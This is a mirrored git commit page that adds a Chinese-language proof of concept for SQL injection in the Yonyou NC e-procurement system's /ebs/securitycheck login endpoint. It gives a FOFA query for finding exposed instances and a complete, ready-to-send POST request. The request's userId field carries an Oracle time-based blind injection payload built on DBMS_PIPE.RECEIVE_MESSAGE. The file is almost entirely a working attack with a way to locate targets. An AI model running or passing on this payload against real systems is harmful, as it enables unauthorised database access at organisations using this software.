mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-28 08:25:35 +08:00
525更新漏洞
This commit is contained in:
33
用友nc电子采购信息系统securitycheck存在sql注入.md
Normal file
33
用友nc电子采购信息系统securitycheck存在sql注入.md
Normal file
@@ -0,0 +1,33 @@
|
||||
## 用友nc电子采购信息系统securitycheck存在sql注入
|
||||
|
||||
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
body="UClient.dmg"
|
||||
```
|
||||
|
||||
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
POST /ebs/securitycheck HTTP/1.1
|
||||
Host: ip
|
||||
Content-Length: 237
|
||||
Method: POST securitycheck HTTP/1.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
|
||||
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
|
||||
Accept: */*
|
||||
Origin: http://ip
|
||||
Referer: http://ip/ebs/core/login/login.jsp
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
|
||||
Cookie: JSESSIONID=691A17DA3C872E1E35BACBE499022DE4.server; JSESSIONID=D80A3F043CD6E898C2076206848019D9.server
|
||||
Connection: close
|
||||
|
||||
&accountCode=ERP%E7%B3%BB%E7%BB%9F&accountCodeValue=0001&datasource=design&corpCode=&maxWindow=0&compressStream=1&corpName=&workdate=123-09-22&userId=11' AND 1129=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(121)||CHR(69)||CHR(110),5) AND 'Fjnc'='Fjnc&password=11&&pageUniqueId=328c7f3e-aea1-4bcf-bd91-05e0d2804719&pageId=login&isAjax=1
|
||||
```
|
||||
|
||||

|
||||
Reference in New Issue
Block a user